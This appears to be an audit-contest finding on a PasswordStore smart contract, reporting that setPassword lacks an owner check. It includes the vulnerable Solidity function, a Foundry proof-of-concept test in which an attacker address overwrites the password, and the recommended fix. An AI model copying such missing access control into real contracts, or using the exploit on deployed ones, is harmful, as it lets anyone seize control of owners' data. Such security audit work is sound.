Submission Details
Severity:
non owner can set password
Summary
The function setPassword(string memory newPassword) external allows anyone the ability to set the password instead of only the owner causing anyone can change the password
Vulnerability Details
function setPassword(string memory newPassword) external {
s_password = newPassword;
emit SetNetPassword();
}
Any one can set the password
Impact
Any one can set the password
POC
function setUp() public {
deployer = new DeployPasswordStore();
passwordStore = deployer.run();
owner = msg.sender;
}
function test_non_owner_can_set_password() public {
vm.startPrank(attacker);
string memory expectedPassword = "attacker password";
passwordStore.setPassword(expectedPassword);
//now password change to attacker's password
vm.startPrank(owner);
string memory actualPassword = passwordStore.getPassword();
assertEq(actualPassword, expectedPassword);
}
Tools Used
-foundry
Recommendations
Check msg.sender for setPassword(string memory newPassword) external fucntion
+ if (msg.sender != s_owner) {
+ revert PasswordStore__NotOwner();
+ }
Updates
Lead Judging Commences
inallhonesty
almost 2 years ago
inallhonesty almost 2 years ago
Submission Judgement Published Assigned finding tags:
finding-lacking-access-control
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
Rewards breakdown
nSLOC
20This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.